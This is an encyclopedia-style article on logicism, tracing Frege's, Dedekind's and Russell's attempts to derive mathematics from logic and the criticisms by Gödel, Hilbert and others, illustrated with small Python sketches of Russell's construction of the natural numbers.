One argument that programmes derived from logicism remain valid might be that the incompleteness theorems are ' proved with logic just like any other theorems '. However, that argument appears not to acknowledge the distinction between theorems of first-order logic and theorems of higher-order logic . The former can be proven using finitary methods, while the latter – in general – cannot. Tarski's undefinability theorem shows that Gödel numbering can be used to prove syntactical constructs, but not semantic assertions. Therefore, the claim that logicism remains a valid programme may commit one to holding that a system of proof based on the existence and properties of the natural numbers is less convincing than one based on some particular formal system. [ 4 ]
Logicism – especially through the influence of Frege on Russell and Wittgenstein [ 5 ] and later Dummett – was a significant contributor to the development of analytic philosophy during the twentieth century.
Ivor Grattan-Guinness states that the French word 'Logistique' was "introduced by Couturat and others at the 1904 International Congress of Philosophy , and was used by Russell and others from then on, in versions appropriate for various languages." (G-G 2000:501).
Apparently the first (and only) usage by Russell appeared in his 1919: "Russell referred several time [sic] to Frege, introducing him as one 'who first succeeded in "logicising" mathematics' (p. 7). Apart from the misrepresentation (which Russell partly rectified by explaining his own view of the role of arithmetic in mathematics), the passage is notable for the word which he put in quotation marks, but their presence suggests nervousness, and he never used the word again, so that 'logicism' did not emerge until the later 1920s" (G-G 2002:434). [ 6 ]
About the same time as Rudolf Carnap (1929), but apparently independently, Fraenkel (1928) used the word: "Without comment he used the name 'logicism' to characterise the Whitehead/Russell position (in the title of the section on p. 244, explanation on p. 263)" (G-G 2002:269). Carnap used a slightly different word 'Logistik'; Behmann complained about its use in Carnap's manuscript so Carnap proposed the word 'Logizismus', but he finally stuck to his word-choice 'Logistik' (G-G 2002:501). Ultimately "the spread was mainly due to Carnap, from 1930 onwards." (G-G 2000:502).
The overt intent of logicism is to derive all of mathematics from symbolic logic (Frege, Dedekind, Peano, Russell.) As contrasted with algebraic logic ( Boolean logic ) that employs arithmetic concepts, symbolic logic begins with a very reduced set of marks (non-arithmetic symbols), a few "logical" axioms that embody the "laws of thought", and rules of inference that dictate how the marks are to be assembled and manipulated – for instance substitution and modus ponens (i.e. from [1] A materially implies B and [2] A , one may derive B ). Logicism also adopts from Frege's groundwork the reduction of natural language statements from "subject|predicate" into either propositional "atoms" or the "argument|function" of "generalization"—the notions " all ", " some ", "class" (collection, aggregate) and "relation".
In a logicist derivation of the natural numbers and their properties, no "intuition" of number should "sneak in" either as an axiom or by accident. The goal is to derive all of mathematics, starting with the counting numbers and then the real numbers, from some chosen "laws of thought" alone, without any tacit assumptions of "before" and "after" or "less" and "more" or to the point: "successor" and "predecessor". Gödel 1944 summarized Russell's logicistic "constructions", when compared to "constructions" in the foundational systems of Intuitionism and Formalism ("the Hilbert School") as follows: "Both of these schools base their constructions on a mathematical intuition whose avoidance is exactly one of the principal aims of Russell's constructivism " (Gödel 1944 in Collected Works 1990:119).
Gödel 1944 summarized the historical background from Leibniz 's Characteristica universalis , through Frege and Peano to Russell: "Frege was chiefly interested in the analysis of thought and used his calculus in the first place for deriving arithmetic from pure logic", whereas Peano "was more interested in its applications within mathematics". But "it was only [in Russell's] Principia Mathematica that full use was made of the new method for actually deriving large parts of mathematics from a very few logical concepts and axioms. In addition, the young science was enriched by a new instrument, the abstract theory of relations" (p. 120-121).
Kleene 1952 states it this way: "Leibniz (1666) first conceived of logic as a science containing the ideas and principles underlying all other sciences. Dedekind (1888) and Frege (1884, 1893, 1903) were engaged in defining mathematical notions in terms of logical ones, and Peano (1889, 1894–1908) in expressing mathematical theorems in a logical symbolism" (p. 43); in the previous paragraph he includes Russell and Whitehead as exemplars of the "logicistic school", the other two "foundational" schools being the intuitionistic and the "formalistic or axiomatic school" (p. 43).
Frege 1879 describes his intent in the Preface to his 1879 Begriffsschrift : He started with a consideration of arithmetic: did it derive from "logic" or from "facts of experience"?
Dedekind 1887 describes his intent in the 1887 Preface to the First Edition of his The Nature and Meaning of Numbers . He believed that in the "foundations of the simplest science; viz., that part of logic which deals with the theory of numbers" had not been properly argued – "nothing capable of proof ought to be accepted without proof":
Peano 1889 states his intent in his Preface to his 1889 Principles of Arithmetic :
Russell 1903 describes his intent in the Preface to his 1903 Principles of Mathematics :
The epistemologies of Dedekind and of Frege seem less well-defined than that of Russell, but both seem accepting as a priori the customary "laws of thought" concerning simple propositional statements (usually of belief); these laws would be sufficient in themselves if augmented with theory of classes and relations (e.g. x R y ) between individuals x and y linked by the generalization R.
Dedekind's argument begins with "1. In what follows I understand by thing every object of our thought"; we humans use symbols to discuss these "things" of our minds; "A thing is completely determined by all that can be affirmed or thought concerning it" (p. 44). In a subsequent paragraph Dedekind discusses what a "system S is: it is an aggregate, a manifold, a totality of associated elements (things) a , b , c "; he asserts that "such a system S . . . as an object of our thought is likewise a thing (1); it is completely determined when with respect to every thing it is determined whether it is an element of S or not.*" (p. 45, italics added). The * indicates a footnote where he states that:
Indeed he awaits Kronecker's "publishing his reasons for the necessity or merely the expediency of these limitations" (p. 45).
Kronecker, famous for his assertion that " God made the integers , all else is the work of man" [ 7 ] had his foes, among them Hilbert. Hilbert called Kronecker a " dogmatist , to the extent that he accepts the integer with its essential properties as a dogma and does not look back" [ 8 ] and equated his extreme constructivist stance with that of Brouwer's intuitionism , accusing both of "subjectivism": "It is part of the task of science to liberate us from arbitrariness, sentiment and habit and to protect us from the subjectivism that already made itself felt in Kronecker's views and, it seems to me, finds its culmination in intuitionism". [ 9 ] Hilbert then states that "mathematics is a presuppositionless science. To found it I do not need God, as does Kronecker . . ." (p. 479).
Russell's realism served him as an antidote to British idealism , [ 10 ] with portions borrowed from European rationalism and British empiricism . [ 11 ] To begin with, "Russell was a realist about two key issues: universals and material objects" (Russell 1912:xi). For Russell, tables are real things that exist independent of Russell the observer. Rationalism would contribute the notion of a priori knowledge, [ 12 ] while empiricism would contribute the role of experiential knowledge (induction from experience). [ 13 ] Russell would credit Kant with the idea of "a priori" knowledge, but he offers an objection to Kant he deems "fatal": "The facts [of the world] must always conform to logic and arithmetic. To say that logic and arithmetic are contributed by us does not account for this" (1912:87); Russell concludes that the a priori knowledge that we possess is "about things, and not merely about thoughts" (1912:89). And in this Russell's epistemology seems different from that of Dedekind's belief that "numbers are free creations of the human mind" (Dedekind 1887:31) [ 14 ]
But his epistemology about the innate (he prefers the word a priori when applied to logical principles, cf. 1912:74) is intricate. He would strongly, unambiguously express support for the Platonic "universals" (cf. 1912:91-118) and he would conclude that truth and falsity are "out there"; minds create beliefs and what makes a belief true is a fact, "and this fact does not (except in exceptional cases) involve the mind of the person who has the belief" (1912:130).
Where did Russell derive these epistemic notions? He tells us in the Preface to his 1903 Principles of Mathematics . Note that he asserts that the belief: "Emily is a rabbit" is non-existent, and yet the truth of this non-existent proposition is independent of any knowing mind; if Emily really is a rabbit, the fact of this truth exists whether or not Russell or any other mind is alive or dead, and the relation of Emily to rabbit-hood is "ultimate":
In 1902 Russell discovered a "vicious circle" ( Russell's paradox ) in Frege's Grundgesetze der Arithmetik , derived from Frege's Basic Law V and he was determined not to repeat it in his 1903 Principles of Mathematics . In two Appendices added at the last minute he devoted 28 pages to both a detailed analysis of Frege's theory contrasted against his own, and a fix for the paradox. But he was not optimistic about the outcome:
Gödel in his 1944 would disagree with the young Russell of 1903 ("[my premisses] allow mathematics to be true") but would probably agree with Russell's statement quoted above ("something is amiss"); Russell's theory had failed to arrive at a satisfactory foundation of mathematics: the result was "essentially negative; i.e. the classes and concepts introduced this way do not have all the properties required for the use of mathematics" (Gödel 1944:132).
How did Russell arrive in this situation? Gödel observes that Russell is a surprising "realist" with a twist: he cites Russell's 1919:169 "Logic is concerned with the real world just as truly as zoology" (Gödel 1944:120). But he observes that "when he started on a concrete problem, the objects to be analyzed (e.g. the classes or propositions) soon for the most part turned into "logical fictions" . . . [meaning] only that we have no direct perception of them." (Gödel 1944:120)
In an observation pertinent to Russell's brand of logicism, Perry remarks that Russell went through three phases of realism: extreme, moderate and constructive (Perry 1997:xxv). In 1903 he was in his extreme phase; by 1905 he would be in his moderate phase. In a few years he would "dispense with physical or material objects as basic bits of the furniture of the world. He would attempt to construct them out of sense-data" in his next book, Our Knowledge of the External World [1914] (Perry 1997:xxvi).
These constructions in what Gödel 1944 would call " nominalistic constructivism ... which might better be called fictionalism " derived from Russell's "more radical idea, the no-class theory" (p. 125):
See more in the Criticism sections, below.
The logicism of Frege and Dedekind is similar to that of Russell, but with differences in the particulars (see Criticisms, below). Overall, the logicist derivations of the natural numbers are different from derivations from, for example, Zermelo's axioms for set theory ('Z'). Whereas, in derivations from Z, one definition of "number" uses an axiom of that system – the axiom of pairing – that leads to the definition of " ordered pair " – no overt number axiom exists in the various logicist axiom systems allowing the derivation of the natural numbers. Note that the axioms needed to derive the definition of a number may differ between axiom systems for set theory in any case. For instance, in ZF and ZFC, the axiom of pairing, and hence ultimately the notion of an ordered pair is derivable from the Axiom of Infinity and the Axiom of Replacement and is required in the definition of the von Neumann numerals (but not the Zermelo numerals), whereas in NFU the Frege numerals may be derived in an analogous way to their derivation in the Grundgesetze.
The Principia , like its forerunner the Grundgesetze , begins its construction of the numbers from primitive propositions such as "class", "propositional function", and in particular, relations of "similarity" (" equinumerosity ": placing the elements of collections in one-to-one correspondence) and "ordering" (using "the successor of" relation to order the collections of the equinumerous classes)". [ 15 ] The logicistic derivation equates the cardinal numbers constructed this way to the natural numbers, and these numbers end up all of the same "type" – as classes of classes – whereas in some set theoretical constructions – for instance the von Neumann and the Zermelo numerals – each number has its predecessor as a subset . Kleene observes the following. (Kleene's assumptions (1) and (2) state that 0 has property P and n +1 has property P whenever n has property P .)
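The "classes of classes" construction can be made concrete in a finite toy model. In the sketch below (our own construction; the universe is cut down to three individuals so that every class is enumerable, whereas the actual construction quantifies over all classes), the number of a collection is the class of all collections similar, i.e. equinumerous, to it:

```python
# A finite toy of the Frege-Russell construction: the "number" of a
# collection is the class of all collections equinumerous with it.
# The universe is restricted to subsets of {a, b, c} so that everything
# is computable; the real construction ranges over all classes.
from itertools import chain, combinations

universe = ("a", "b", "c")
collections = list(chain.from_iterable(
    combinations(universe, k) for k in range(len(universe) + 1)))

def equinumerous(xs, ys):
    # For finite collections, a one-to-one correspondence exists
    # exactly when the collections have the same size.
    return len(xs) == len(ys)

def number_of(xs):
    """The class of all collections similar (equinumerous) to xs."""
    return frozenset(c for c in collections if equinumerous(c, xs))

two = number_of(("a", "b"))
print(sorted(map(sorted, two)))        # [['a', 'b'], ['a', 'c'], ['b', 'c']]
print(number_of(("b", "c")) == two)    # True: same cardinal, same class
```

On this picture each natural number is a single class of classes, all of the same type, rather than a chain of nested sets as in the von Neumann construction mentioned above.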
The importance to the logicist programme of the construction of the natural numbers derives from Russell's contention "That all traditional pure mathematics can be derived from the natural numbers is a fairly recent discovery, though it had long been suspected" (1919:4). One derivation of the real numbers proceeds from the theory of Dedekind cuts on the rational numbers, the rational numbers in turn being derived from the naturals. While an example of how this is done is useful, it relies first on the derivation of the natural numbers. So, if philosophical difficulties appear in a logicist derivation of the natural numbers, these problems should be sufficient to stop the program until they are resolved (see Criticisms, below).
One attempt to construct the natural numbers is summarized by Bernays 1930–1931. [ 16 ] But rather than use Bernays' précis, which is incomplete in some details, an attempt at a paraphrase of Russell's construction, incorporating some finite illustrations, is set out below:
For Russell, collections (classes) are aggregates of "things" specified by proper names, that come about as the result of propositions (assertions of fact about a thing or things). Russell analysed this general notion. He begins with "terms" in sentences, which he analysed as follows:
For Russell, "terms" are either "things" or "concepts": "Whatever may be an object of thought, or may occur in any true or false proposition, or can be counted as one, I call a term . This, then, is the widest word in the philosophical vocabulary. I shall use as synonymous with it the words, unit, individual, and entity. The first two emphasize the fact that every term is one, while the third is derived from the fact that every term has being, i.e. is in some sense. A man, a moment, a number, a class, a relation, a chimaera, or anything else that can be mentioned, is sure to be a term; and to deny that such and such a thing is a term must always be false" (Russell 1903:43)
"Among terms, it is possible to distinguish two kinds, which I shall call respectively things and concepts ; the former are the terms indicated by proper names, the latter those indicated by all other words . . . Among concepts, again, two kinds at least must be distinguished, namely those indicated by adjectives and those indicated by verbs" (1903:44).
"The former kind will often be called predicates or class-concepts; the latter are always or almost always relations." (1903:44)
"I shall speak of the terms of a proposition as those terms, however numerous, which occur in a proposition and may be regarded as subjects about which the proposition is. It is a characteristic of the terms of a proposition that anyone of them may be replaced by any other entity without our ceasing to have a proposition. Thus we shall say that "Socrates is human" is a proposition having only one term; of the remaining component of the proposition, one is the verb, the other is a predicate.. . . Predicates, then, are concepts, other than verbs, which occur in propositions having only one term or subject." (1903:45)
Suppose one were to point to an object and say: "This object in front of me named 'Emily' is a woman." This is a proposition, an assertion of the speaker's belief, which is to be tested against the "facts" of the outer world: "Minds do not create truth or falsehood. They create beliefs . . . what makes a belief true is a fact , and this fact does not (except in exceptional cases) in any way involve the mind of the person who has the belief" (1912:130). If by investigation of the utterance and correspondence with "fact", Russell discovers that Emily is a rabbit, then his utterance is considered "false"; if Emily is a female human (a female "featherless biped" as Russell likes to call humans, following Diogenes Laërtius 's anecdote about Plato ), then his utterance is considered "true".
"The class, as opposed to the class-concept, is the sum or conjunction of all the terms which have the given predicate" (1903 p. 55). Classes can be specified by extension (listing their members) or by intension, i.e. by a "propositional function" such as " x is a u " or " x is v ". But "if we take extension pure, our class is defined by enumeration of its terms, and this method will not allow us to deal, as Symbolic Logic does, with infinite classes. Thus our classes must in general be regarded as objects denoted by concepts, and to this extent the point of view of intension is essential." (1909 p. 66)
"The characteristic of a class concept, as distinguished from terms in general, is that " x is a u " is a propositional function when, and only when, u is a class-concept." (1903:56)
"71. Class may be defined either extensionally or intensionally. That is to say, we may define the kind of object which is a class, or the kind of concept which denotes a class: this is the precise meaning of the opposition of extension and intension in this connection. But although the general notion can be defined in this two-fold manner, particular classes, except when they happen to be finite, can only be defined intensionally, i.e. as the objects denoted by such and such concepts. . . logically; the extensional definition appears to be equally applicable to infinite classes, but practically, if we were to attempt it, Death would cut short our laudable endeavour before it had attained its goal."(1903:69)
In the Principia , the natural numbers derive from all propositions that can be asserted about any collection of entities. Russell makes this clear in the second (italicized) sentence below.
To illustrate, consider the following finite example: Suppose there are 12 families on a street. Some have children, some do not. To discuss the names of the children in these households requires 12 propositions asserting " childname is the name of a child in family F n " applied to this collection of households on the particular street of families with names F1, F2, . . . F12. Each of the 12 propositions regards whether or not the "argument" childname applies to a child in a particular household. The children's names ( childname ) can be thought of as the x in a propositional function f ( x ), where the function is "name of a child in the family with name F n ". [ 17 ] [ original research? ]
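As a rough illustration of a propositional function over a finite domain, the following sketch encodes the family example; the family and child names are invented:

```python
# Hypothetical data: each family maps to the names of its children.
families = {
    "F1": ["Alice", "Tom"],
    "F2": [],            # a childless household
    "F3": ["Maria"],
}

def is_child_in_family(childname: str, family: str) -> bool:
    """The propositional function f(x): 'childname is the name of a
    child in family Fn'; it yields a truth value for each argument."""
    return childname in families[family]

print(is_child_in_family("Alice", "F1"))  # True
print(is_child_in_family("Alice", "F3"))  # False
```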
Whereas the preceding example is finite over the finite propositional function " childnames of the children in family F n " on the finite street of a finite number of families, Russell apparently intended the following to extend to all propositional functions extending over an infinite domain so as to allow the creation of all the numbers.
Kleene considers that Russell has set out an impredicative definition that he will have to resolve, or risk deriving something like the Russell paradox . "Here instead we presuppose the totality of all properties of cardinal numbers, as existing in logic, prior to the definition of the natural number sequence" (Kleene 1952:44). The problem will appear, even in the finite example presented here, when Russell deals with the unit class (cf. Russell 1903:517).
The question arises what precisely a "class" is or should be. For Dedekind and Frege, a class is a distinct entity in its own right, a 'unity' that can be identified with all those entities x that satisfy some propositional function F . (This symbolism appears in Russell, attributed there to Frege: "The essence of a function is what is left when the x is taken away, i.e. in the above instance, 2( )³ + ( ). The argument x does not belong to the function, but the two together make a whole (ib. p. 6 [i.e. Frege's 1891 Function und Begriff ])" (Russell 1903:505).) For example, a particular "unity" could be given a name; suppose a family Fα has the children with the names Annie, Barbie and Charles; the class of Fα's children, {Annie, Barbie, Charles}, could then be treated as a single named object.
This notion of collection or class as object, when used without restriction, results in Russell's paradox ; see more below about impredicative definitions . Russell's solution was to define the notion of a class to be only those elements that satisfy the proposition, his argument being that, indeed, the arguments x do not belong to the propositional function aka "class" created by the function. The class itself is not to be regarded as a unitary object in its own right, it exists only as a kind of useful fiction: "We have avoided the decision as to whether a class of things has in any sense an existence as one object. A decision of this question in either way is indifferent to our logic" (First edition of Principia Mathematica 1927:24).
Russell continues to hold this opinion in his 1919; observe the words "symbolic fictions": [ original research? ]
And in the second edition of PM (1927) Russell holds that "functions occur only through their values, . . . all functions of functions are extensional, . . . [and] consequently there is no reason to distinguish between functions and classes . . . Thus classes, as distinct from functions, lose even that shadowy being which they retain in *20" (p. xxxix). In other words, classes as a separate notion have vanished altogether.
Step 2: Collect "similar" classes into 'bundles' : These above collections can be put into a "binary relation" (comparing for) similarity by "equinumerosity", symbolized here by ≈ , i.e. one-one correspondence of the elements, [ 18 ] and thereby create Russellian classes of classes or what Russell called "bundles". "We can suppose all couples in one bundle, all trios in another, and so on. In this way we obtain various bundles of collections, each bundle consisting of all the collections that have a certain number of terms. Each bundle is a class whose members are collections, i.e. classes; thus each is a class of classes" (Russell 1919:14).
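For finite classes, equinumerosity can be checked directly, since a one-one correspondence between finite classes exists exactly when they have the same number of elements. A minimal sketch of Step 2 under that assumption, with invented sample classes:

```python
# Sample classes (sets of "terms"), invented for illustration.
classes = [{"a"}, {"b", "c"}, {"d"}, set(), {"e", "f"}]

def similar(u: set, v: set) -> bool:
    """Equinumerosity (≈) for finite classes: a one-one correspondence
    exists exactly when the two classes have the same cardinality."""
    return len(u) == len(v)

bundles = []            # each bundle is a class of classes
for c in classes:
    for bundle in bundles:
        if similar(c, bundle[0]):
            bundle.append(c)   # join the bundle of similar classes
            break
    else:
        bundles.append([c])    # start a new bundle

print(bundles)
# [[{'a'}, {'d'}], [{'b', 'c'}, {'e', 'f'}], [set()]]
```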
Step 3: Define the null class : Notice that a certain class of classes is special because its classes contain no elements, i.e. no elements satisfy the predicates whose assertion defined this particular class/collection.
The resulting entity may be called "the null class" or "the empty class". Russell symbolized the null/empty class with Λ. So what exactly is the Russellian null class? In PM Russell says that "A class is said to exist when it has at least one member . . . the class which has no members is called the "null class" . . . "α is the null-class" is equivalent to "α does not exist"." The question naturally arises whether the null class itself 'exists'. Difficulties related to this question occur in Russell's 1903 work. [ 19 ] After he discovered the paradox in Frege's Grundgesetze he added Appendix A to his 1903 where, through the analysis of the nature of the null and unit classes, he discovered the need for a "doctrine of types"; see more about the unit class, the problem of impredicative definitions and Russell's "vicious circle principle" below. [ 19 ]
Step 4: Assign a "numeral" to each bundle : For purposes of abbreviation and identification, to each bundle assign a unique symbol (aka a "numeral"). These symbols are arbitrary.
Step 5: Define "0" Following Frege, Russell picked the empty or null class of classes as the appropriate class to fill this role, this being the class of classes having no members. This null class of classes may be labelled "0"
Step 6: Define the notion of "successor" : Russell defined a new characteristic "hereditary" (cf Frege's 'ancestral'), a property of certain classes with the ability to "inherit" a characteristic from another class (which may be a class of classes) i.e. "A property is said to be "hereditary" in the natural-number series if, whenever it belongs to a number n , it also belongs to n +1, the successor of n " (1919:21). He asserts that "the natural numbers are the posterity – the "children", the inheritors of the "successor" – of 0 with respect to the relation "the immediate predecessor of" (which is the converse of "successor")" (1919:23).
Note Russell has used a few words here without definition, in particular "number series", "number n ", and "successor". He will define these in due course. Observe in particular that Russell does not use the unit class of classes "1" to construct the successor . The reason is that, in Russell's detailed analysis, [ 20 ] if a unit class becomes an entity in its own right, then it too can be an element in its own proposition; this causes the proposition to become "impredicative" and result in a "vicious circle". Rather, he states: "We saw in Chapter II that a cardinal number is to be defined as a class of classes, and in Chapter III that the number 1 is to be defined as the class of all unit classes, of all that have just one member, as we should say but for the vicious circle. Of course, when the number 1 is defined as the class of all unit classes, unit classes must be defined so as not to assume that we know what is meant by one " (1919:181).
For his definition of successor, Russell will use for his "unit" a single entity or "term" as follows:
Russell's definition requires a new "term" which is "added into" the collections inside the bundles.
Step 7: Construct the successor of the null class .
Step 8: For every class of equinumerous classes, create its successor .
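A finite sketch of Steps 7 and 8 might look as follows; it merely gestures at Russell's definition by "adding into" each class of a bundle one fresh term, with helper names invented for illustration:

```python
# Assumes the fresh term is not already a member of any class in the
# bundle; Russell's actual construction is for arbitrary classes, not
# Python sets.
def successor_bundle(bundle: list, fresh_term: str) -> list:
    """Return the bundle whose classes each have one more member."""
    return [cls | {fresh_term} for cls in bundle]

null_bundle = [set()]                             # the bundle "0"
one_bundle = successor_bundle(null_bundle, "x1")  # classes with one member: "1"
two_bundle = successor_bundle(one_bundle, "x2")   # classes with two members: "2"

print(one_bundle)  # [{'x1'}]
print(two_bundle)  # [{'x1', 'x2'}] (set display order may vary)
```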
Step 9: Order the numbers : The process of creating a successor requires the relation " . . . is the successor of . . .", which may be denoted " S ", between the various "numerals". "We must now consider the serial character of the natural numbers in the order 0, 1, 2, 3, . . . We ordinarily think of the numbers as in this order, and it is an essential part of the work of analysing our data to seek a definition of "order" or "series " in logical terms. . . . The order lies, not in the class of terms, but in a relation among the members of the class, in respect of which some appear as earlier and some as later." (1919:31)
Russell applies to the notion of "ordering relation" three criteria: First, he defines the notion of asymmetry i.e. given the relation such as S (" . . . is the successor of . . . ") between two terms x and y : x S y ≠ y S x . Second, he defines the notion of transitivity for three numerals x , y and z : if x S y and y S z then x S z . Third, he defines the notion of connected : "Given any two terms of the class which is to be ordered, there must be one which precedes and the other which follows. . . . A relation is connected when, given any two different terms of its field [both domain and converse domain of a relation e.g. husbands versus wives in the relation of married] the relation holds between the first and the second or between the second and the first (not excluding the possibility that both may happen, though both cannot happen if the relation is asymmetrical)." (1919:32)
He concludes: ". . . [natural] number m is said to be less than another number n when n possesses every hereditary property possessed by the successor of m . It is easy to see, and not difficult to prove, that the relation "less than", so defined, is asymmetrical, transitive, and connected, and has the [natural] numbers for its field [i.e. both domain and converse domain are the numbers]." (1919:35)
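Russell's three criteria can be checked by brute force on a small initial segment of the naturals; the following sketch verifies asymmetry, transitivity, and connectedness for the finite sample only, not in general:

```python
numbers = range(6)

def less(x: int, y: int) -> bool:
    return x < y

# Asymmetry: never both x < y and y < x.
asymmetric = all(not (less(x, y) and less(y, x))
                 for x in numbers for y in numbers)
# Transitivity: x < y and y < z imply x < z.
transitive = all(less(x, z) or not (less(x, y) and less(y, z))
                 for x in numbers for y in numbers for z in numbers)
# Connectedness: any two distinct terms are comparable.
connected = all(x == y or less(x, y) or less(y, x)
                for x in numbers for y in numbers)

print(asymmetric, transitive, connected)  # True True True
```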
The presumption of an 'extralogical' notion of iteration : Kleene notes that "the logicistic thesis can be questioned finally on the ground that logic already presupposes mathematical ideas in its formulation. In the Intuitionistic view, an essential mathematical kernel is contained in the idea of iteration" (Kleene 1952:46)
Bernays 1930–1931 observes that this notion "two things" already presupposes something, even without the claim of existence of two things, and also without reference to a predicate, which applies to the two things; it means, simply, "a thing and one more thing. . . . With respect to this simple definition, the Number concept turns out to be an elementary structural concept . . . the claim of the logicists that mathematics is purely logical knowledge turns out to be blurred and misleading upon closer observation of theoretical logic. . . . [one can extend the definition of "logical"] however, through this definition what is epistemologically essential is concealed, and what is peculiar to mathematics is overlooked" (in Mancosu 1998:243).
Hilbert 1931:266-7, like Bernays, considers there is "something extra-logical" in mathematics: "Besides experience and thought, there is yet a third source of knowledge. Even if today we can no longer agree with Kant in the details, nevertheless the most general and fundamental idea of the Kantian epistemology retains its significance: to ascertain the intuitive a priori mode of thought, and thereby to investigate the condition of the possibility of all knowledge. In my opinion this is essentially what happens in my investigations of the principles of mathematics. The a priori is here nothing more and nothing less than a fundamental mode of thought, which I also call the finite mode of thought: something is already given to us in advance in our faculty of representation: certain extra-logical concrete objects that exist intuitively as an immediate experience before all thought. If logical inference is to be certain, then these objects must be completely surveyable in all their parts, and their presentation, their differences, their succeeding one another or their being arrayed next to one another is immediately and intuitively given to us, along with the objects, as something that neither can be reduced to anything else, nor needs such a reduction." (Hilbert 1931 in Mancosu 1998: 266, 267).
In brief, according to Hilbert and Bernays, the notion of "sequence" or "successor" is an a priori notion that lies outside symbolic logic.
Hilbert dismissed logicism as a "false path": "Some tried to define the numbers purely logically; others simply took the usual number-theoretic modes of inference to be self-evident. On both paths they encountered obstacles that proved to be insuperable." (Hilbert 1931 in Mancosu 1998:267). The incompleteness theorems arguably constitute a similar obstacle for Hilbertian finitism.
Mancosu states that Brouwer concluded that: "the classical laws or principles of logic are part of [the] perceived regularity [in the symbolic representation]; they are derived from the post factum record of mathematical constructions . . . Theoretical logic . . . [is] an empirical science and an application of mathematics" (Brouwer quoted by Mancosu 1998:9).
With respect to the technical aspects of Russellian logicism as it appears in Principia Mathematica (either edition), Gödel in 1944 was disappointed:
In particular he pointed out that "The matter is especially doubtful for the rule of substitution and of replacing defined symbols by their definiens " (Gödel 1944:120).
With respect to the philosophy that might underlie these foundations, Gödel considered Russell's "no-class theory" as embodying a "nominalistic kind of constructivism . . . which might better be called fictionalism" (cf. footnote 1 in Gödel 1944:119) – to be faulty. See more in "Gödel's criticism and suggestions" below.
A complicated theory of relations continued to strangle Russell's explanatory 1919 Introduction to Mathematical Philosophy and his 1927 second edition of Principia . Set theory, meanwhile, had moved on with its reduction of relations to ordered pairs of sets. Grattan-Guinness observes that in the second edition of Principia Russell ignored this reduction, which had been achieved by his own student Norbert Wiener (1914). Perhaps because of "residual annoyance, Russell did not react at all". [ 21 ] By 1914 Hausdorff would provide another, equivalent definition, and Kuratowski in 1921 would provide the one in use today. [ 22 ]
Suppose a librarian wants to index her collection into a single book (call it Ι for "index"). Her index will list all the books and their locations in the library. As it turns out, there are only three books, and these have titles Ά, β, and Γ. To form her index I, she goes out and buys a book of 200 blank pages and labels it "I". Now she has four books: I, Ά, β, and Γ. Her task is not difficult. When completed, the contents of her index I are 4 pages, each with a unique title and unique location (each entry abbreviated as Title.Location T ):
This sort of definition of I was deemed by Poincaré to be " impredicative ". He seems to have considered that only predicative definitions can be allowed in mathematics:
By Poincaré's definition, the librarian's index book is "impredicative" because the definition of I is dependent upon the definition of the totality I, Ά, β, and Γ. As noted below, some commentators insist that impredicativity in commonsense versions is harmless, but as the examples show below there are versions which are not harmless. In response to these difficulties, Russell advocated a strong prohibition, his "vicious circle principle":
To illustrate what a pernicious instance of impredicativity might be, consider the consequence of inputting argument α into the function f with output ω = 1−α. This may be seen as the equivalent 'algebraic-logic' expression to the 'symbolic-logic' expression ω = NOT -α, with truth values 1 and 0. When input α = 0, output ω = 1; when input α = 1, output ω = 0.
To make the function "impredicative", identify the input with the output, yielding α = 1−α
Within the algebra of, say, the rational numbers the equation is satisfied when α = 0.5. But within, for instance, a Boolean algebra, where only the "truth values" 0 and 1 are permitted, the equality cannot be satisfied.
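The contrast can be made concrete in a few lines; the following sketch shows that the fixed-point equation α = 1 − α has a solution among the rationals but none among the Boolean truth values:

```python
from fractions import Fraction

def f(a):
    return 1 - a          # ω = 1 − α, i.e. ω = NOT-α over {0, 1}

half = Fraction(1, 2)
print(f(half) == half)    # True: α = 1/2 is a fixed point

print([a for a in (0, 1) if f(a) == a])  # []: no Boolean solution
```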
Some of the difficulties in the logicist programme may derive from the α = NOT-α paradox [ 25 ] that Russell discovered in Frege's 1879 Begriffsschrift : [ 26 ] Frege had allowed a function to derive its input "functional" (value of its variable) not only from an object (thing, term), but also from the function's own output. [ 27 ]
As described above, both Frege's and Russell's constructions of the natural numbers begin with the formation of equinumerous classes of classes ("bundles"), followed by an assignment of a unique "numeral" to each bundle, and then by the placing of the bundles into an order via a relation S that is asymmetric: x S y ≠ y S x . But Frege, unlike Russell, allowed the class of unit classes to be identified as a unit itself:
But, since the class with numeral 1 is a single object or unit in its own right, it too must be included in the class of unit classes. This inclusion results in an infinite regress of increasing type and increasing content.
Russell avoided this problem by declaring a class to be more or less a "fiction". By this he meant that a class could designate only those elements that satisfied its propositional function and nothing else. As a "fiction" a class cannot be considered to be a thing: an entity, a "term", a singularity, a "unit". It is an assemblage but is not in Russell's view "worthy of thing-hood":
This supposes that "at the bottom" every single solitary "term" can be listed (specified by a "predicative" predicate) for any class, for any class of classes, for any class of classes of classes, etc., but it introduces a new problem—a hierarchy of "types" of classes.
Gödel 1944:131 observes that "Russell adduces two reasons against the extensional view of classes, namely the existence of (1) the null class, which cannot very well be a collection, and (2) the unit classes, which would have to be identical with their single elements." He suggests that Russell should have regarded these as fictitious, but should not have drawn the further conclusion that all classes (such as the classes-of-classes that define the numbers 2, 3, etc.) are fictions.
But Russell did not do this. After a detailed analysis in Appendix A: The Logical and Arithmetical Doctrines of Frege in his 1903, Russell concludes:
In the following notice the wording "the class as many"—a class is an aggregate of those terms (things) that satisfy the propositional function, but a class is not a thing-in-itself :
It is as if a rancher were to round up all his livestock (sheep, cows and horses) into three fictitious corrals (one for the sheep, one for the cows, and one for the horses) that are located in his fictitious ranch. What actually exist are the sheep, the cows and the horses (the extensions), but not the fictitious "concepts" corrals and ranch. [ original research? ]
When Russell proclaimed all classes are useful fictions he solved the problem of the "unit" class, but the overall problem did not go away; rather, it arrived in a new form: "It will now be necessary to distinguish (1) terms, (2) classes, (3) classes of classes, and so on ad infinitum ; we shall have to hold that no member of one set is a member of any other set, and that x ε u requires that x should be of a set of a degree lower by one than the set to which u belongs. Thus x ε x will become a meaningless proposition; and in this way the contradiction is avoided" (1903:517).
This is Russell's "doctrine of types". To guarantee that impredicative expressions such as x ε x can be treated in his logic, Russell proposed, as a kind of working hypothesis, that all such impredicative definitions have predicative definitions. This supposition requires the notions of function-"orders" and argument-"types". First, functions (and their classes-as-extensions, i.e. "matrices") are to be classified by their "order", where functions of individuals are of order 1, functions of functions (classes of classes) are of order 2, and so forth. Next, he defines the "type" of a function's arguments (the function's "inputs") to be their "range of significance", i.e. what are those inputs α (individuals? classes? classes-of-classes? etc.) that, when plugged into f ( x ), yield a meaningful output ω. Note that this means that a "type" can be of mixed order, as the following example shows:
